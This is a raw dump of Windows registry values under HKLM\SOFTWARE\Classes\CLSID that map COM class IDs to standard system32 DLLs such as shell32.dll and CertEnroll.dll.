REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{83bb272f-7d5e-4b6e-9250-889893f0dac7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{83BC5EC0-6F2A-11d0-A1C4-00AA00C16E65}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dsquery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{83e05bd5-aec1-4e58-ae50-e819c7296f67}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iasdatastore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{83F18638-2238-4B33-9FF8-24E759ADDC66}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8408B448-06CC-47A0-B482-BDAB666AF557}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\DeviceSetupStatusProvider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{840A0DD9-DC22-4f92-ABCE-894E6D8DCF47}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\remoteaudioendpoint.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{842D84C9-C347-11D1-8F64-00C04FB611C7}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\msdtctm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{84302F97-7F7B-4040-B190-72AC9D18E420}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\UIAnimation.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{846225EA-B241-42A7-9D46-A694ECD5A781}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{84840C72-9913-4D9F-BEE4-447A8A875B82}\InprocServer32 (Default) REG_EXPAND_SZ %SYSTEMROOT%\System32\wbem\appbackgroundtask.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{849F5497-5C61-4023-8E10-A28F1A8C6A70} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\SecurityHealthAgent.dll,-12001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{849F5497-5C61-4023-8E10-A28F1A8C6A70}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\SecurityHealthAgent.dll,-101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{84a3a6bf-f1d8-496e-9f05-d3de70973152}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\WWanHC.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{84CCE1D2-97AD-4448-AF0F-A79164073A60}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\themecpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{84DE202D-5D95-4764-9014-A46F994CE856}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AdmTmpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{84DE202E-5D95-4764-9014-A46F994CE856}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AdmTmpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{84e04a55-2d42-4909-86e3-62fd11483e8b}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\setupcln.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8509bb76-ffa3-4827-ba5e-2e786010f42f}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{850D1D11-70F3-4BE5-9A11-77AA6B2BB201} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\wiaaut.dll,-3000 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{850D1D11-70F3-4BE5-9A11-77AA6B2BB201}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wiaaut.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{850D1D11-70F3-4BE5-9A11-77AA6B2BB201}\ToolboxBitmap32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wiaaut.dll, 102 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{854CB94F-2279-4F7F-AC62-31E22E4D8899}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wlanpref.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{855fec53-d2e4-4999-9e87-3414e9cf0ff4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wdc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8570b44e-d109-42d3-be32-0f8d446669c5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8580ca99-925D-4537-959B-B7C9EA45FC01}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\desktopshellext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{858DACA2-78B4-412F-9A4E-315BBB4E1F21}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{859AC360-A8F0-4d82-BBC7-7E28529FCC46}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmcsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{85AFC315-CAC7-4475-875B-D7161BA14874}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{85B3D708-4313-43F4-959B-829654791E8C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\PackageStateRoaming.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{85cfccaf-2d14-42b6-80b6-f40f65d016e7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{85D88658-CFDB-4F51-AD06-4DAC60CB5AFB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{85e94d25-0712-47ed-8cde-b0971177c6a1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8601319a-d7cf-40f3-9025-7f77125453c6}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\sxsstore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{862321c3-70b2-4ee2-8231-87ec05819d98}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netcorehc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{863aa9fd-42df-457b-8e4d-0de1b8015c60} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\prnfldr.dll,-8062 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\prnfldr.dll,-8036 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{863aa9fd-42df-457b-8e4d-0de1b8015c60}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-26 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{863aa9fd-42df-457b-8e4d-0de1b8015c60}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\prnfldr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{863FA3AC-9D97-4560-9587-7FA58727608B}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\filemgmt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{86422020-42A0-1069-A2E5-08002B30309D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{864A1288-354C-4D19-9D68-C2742BB14997}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{865ab07b-1c8e-48c0-b9a7-fa6c5ff48f7b}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{86bec222-30f2-47e0-9f25-60d11cd75c28}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{86c14003-4d6b-4ef3-a7b4-0506663b2e68}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{86C86720-42A0-1069-A2E8-08002B30309D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{86d5eb8a-859f-4c7b-a76b-2bd819b7a850} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\usercpl.dll,-71 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{86d5eb8a-859f-4c7b-a76b-2bd819b7a850}\Elevation IconReference REG_EXPAND_SZ @%Systemroot%\System32\usercpl.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{86d5eb8a-859f-4c7b-a76b-2bd819b7a850}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shpafact.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{86EB3FD8-E142-4f3d-B3D3-5D8F41097D58}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobeplugins.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{86F80216-5DD6-4F43-953B-35EF40A35AEE} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\wlanui.dll,-17301 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{86F80216-5DD6-4F43-953B-35EF40A35AEE}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wlanui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{86FFEF81-E868-46F8-ACC2-290C2D8C3659}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DuCsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{870AF99C-171D-4f9e-AF0D-E63DF40C2BC9}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioses.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\ieframe.dll,-5723 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{872f8dc8-dde4-43bd-ac7a-e3d9fe86ceac}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SystemResetPlatform\SystemResetSSO.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{87630419-6216-4ff8-a1f0-143562d16d5c} InfoTip REG_EXPAND_SZ @%systemroot%\system32\wwanpref.dll,-2002 LocalizedString REG_EXPAND_SZ @%systemroot%\system32\wwanpref.dll,-2001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{87630419-6216-4ff8-a1f0-143562d16d5c}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wwanpref.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{877A0BB7-A313-4491-87B5-2E6D0594F520}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{877ca5ac-cb41-4842-9c69-9136e42d47e2} InfoTip REG_EXPAND_SZ @%systemroot%\system32\sdshext.dll,-102 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{877ca5ac-cb41-4842-9c69-9136e42d47e2}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\sdshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{879795A1-A911-4FEF-984F-1A1CA4E14637}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{879fb53b-cba3-4fc8-b233-d9a93afa7fbc}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\hgcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{87AB8051-37BD-4e70-83C0-1E4F9AE1D37D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{87BB326B-E4A0-4de1-94F0-B9F41D0C6059}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\eapp3hst.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{87C8BA99-B13E-4BAE-87EE-E14A13172B26}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\PrintWSDAHost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{87CB4E0D-2E2F-4235-BC0A-7C62308011F6}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\defragproxy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{87D66A43-7B11-4A28-9811-C86EE395ACF7} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\srchadmin.dll,-602#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\srchadmin.dll,-601#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{87D66A43-7B11-4A28-9811-C86EE395ACF7}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\srchadmin.dll,-201 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{87D66A43-7B11-4A28-9811-C86EE395ACF7}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\srchadmin.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{87FC0268-9A55-4360-95AA-004A1D9DE26C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dsdmo.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{880ac964-2e34-4425-8cf2-86ada2c3a019}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{883373C3-BF89-11D1-BE35-080036B11A03}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{883FF1FC-09E1-48e5-8E54-E2469ACB0CFD}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\srcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8841d728-1a76-4682-bb6f-a9ea53b4b3ba}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\keymgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2000-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2001-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2002-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2003-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2007-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2008-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2009-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e200b-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e200c-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e200d-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e200e-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e200f-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2010-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2011-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2012-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2013-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2014-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2015-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2016-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2017-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2018-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2019-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e201a-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e201b-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e201c-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e201d-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e201e-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e201f-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2020-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2021-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2022-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2023-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2024-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2025-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2026-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2027-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2028-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e202a-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e202b-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e202c-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e202d-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e202e-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e202f-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2030-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2031-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2032-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2033-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2034-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2036-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2037-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2038-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2039-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e203a-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e203b-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e203d-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e203f-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2042-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2043-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2044-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2045-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2046-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2049-217d-11da-b2a4-000e7bbb2b09}\LocalServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnrollCtrl.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e204c-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2050-217d-11da-b2a4-000e7bbb2b09} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\CertEnroll.dll,-490 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2050-217d-11da-b2a4-000e7bbb2b09}\LocalServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnrollCtrl.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2051-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll 